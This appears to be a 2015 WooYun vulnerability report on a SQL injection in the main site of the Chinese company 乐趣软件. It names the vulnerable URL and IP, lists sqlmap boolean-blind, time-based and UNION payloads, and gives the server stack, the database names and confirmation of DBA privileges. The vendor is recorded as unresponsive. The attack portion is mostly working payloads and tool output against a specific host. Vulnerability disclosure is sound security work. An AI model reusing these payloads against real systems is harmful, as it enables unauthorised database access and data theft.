漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0153694
漏洞标题:乐趣软件主站SQL注入(泄露全站数据)
相关厂商:乐趣软件
漏洞作者: 逆流冰河
提交时间:2015-11-12 08:35
修复时间:2015-12-27 08:36
公开时间:2015-12-27 08:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
如下
详细说明:
1,注入点:http://124.248.34.227/detail.html?pid=10077208
2,库结构
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=10077208' AND 4263=4263 AND 'VsPX'='VsPX
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pid=10077208' AND (SELECT * FROM (SELECT(SLEEP(5)))suiG) AND 'aDqk'='aDqk
Type: UNION query
Title: Generic UNION query (NULL) - 37 columns
Payload: pid=-7428' UNION ALL SELECT NULL,NULL,CONCAT(0x717a626271,0x6a634271476653516c5a,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.4.12, Apache 2.4.3
back-end DBMS: MySQL 5.0.12
available databases [12]:
[*] discuz
[*] hiwap
[*] ido
[*] information_schema
[*] lqwx_app_back
[*] lqwx_app_spider
[*] lqwx_game_service
[*] mail
[*] mysql
[*] performance_schema
[*] postfix
[*] test
3,而且,而且还是dba权限
web application technology: PHP 5.4.12, Apache 2.4.3
back-end DBMS: MySQL 5.0.12
[21:33:00] [INFO] testing if current user is DBA
[21:33:00] [INFO] fetching current user
current user is DBA: True
[21:33:01] [INFO] fetched data logged to
4,我就不继续了
漏洞证明:
如上
修复方案:
Fix
版权声明:转载请注明来源 逆流冰河@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝